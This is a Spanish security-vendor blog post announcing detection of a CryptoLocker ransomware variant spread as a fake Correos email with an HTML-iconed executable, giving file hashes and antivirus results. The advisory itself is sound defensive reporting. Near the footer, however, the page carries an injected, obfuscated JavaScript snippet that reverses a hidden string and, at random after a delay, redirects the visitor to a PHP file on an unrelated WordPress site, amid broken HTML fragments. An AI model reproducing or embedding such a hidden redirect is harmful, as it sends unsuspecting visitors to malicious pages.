Nueva variante del RANSOMWARE CRYPTOLOCKER ahora con icono de HTML
Una nueva generación de estos malwares nestá llegando igualmente en el falso mail de CORREOS pero esta vez el icono del fichero
carta_certificada_784512.exe
tiene icono de HTML:
tolocker” width=”257″ height=”71″ />
Lo pasamos a controlar a partir del ELISTARA 32.23 de hoy
El preanalisis de virustotal ofrece el siguiente informe:.
MD5 e8116c3e5ffe3066f48aebf6d8d186ba
SHA1 8c2b299a94ff9962d768451e26c90602bc5f26f2
File size 280.0 KB ( 286720 bytes )
SHA256: c0b6953bf1306d0697b716f1999eb6da518924132e041a050e9e5eb2f1d545a8
File name: carta_certificada_784512.exe
Detection ratio: 6 / 55
Analysis date: 2015-05-06 13:15:52 UTC ( 1 hour, 12 minutes ago )
0 1
Antivirus Result Update
DrWeb Trojan.DownLoader13.10898 20150506
ESET-NOD32 a variant of Win32/Injector.BZWL 20150506
Kaspersky UDS:DangerousObject.Multi.Generic 20150506
McAfee Packed-EM!E8116C3E5FFE 20150506
Qihoo-360 HEUR/QVM07.1.Malware.Gen 20150506
Rising PE:Malware.Obscure!1.9C59 20150505
Dicha version del ELISTARA 32.23 que lo detectará y eliminará, estará disponible en nuestra web a partir de las 18 h CDEST de hoy
saludos
ms, 6-5-2015
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolocker.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.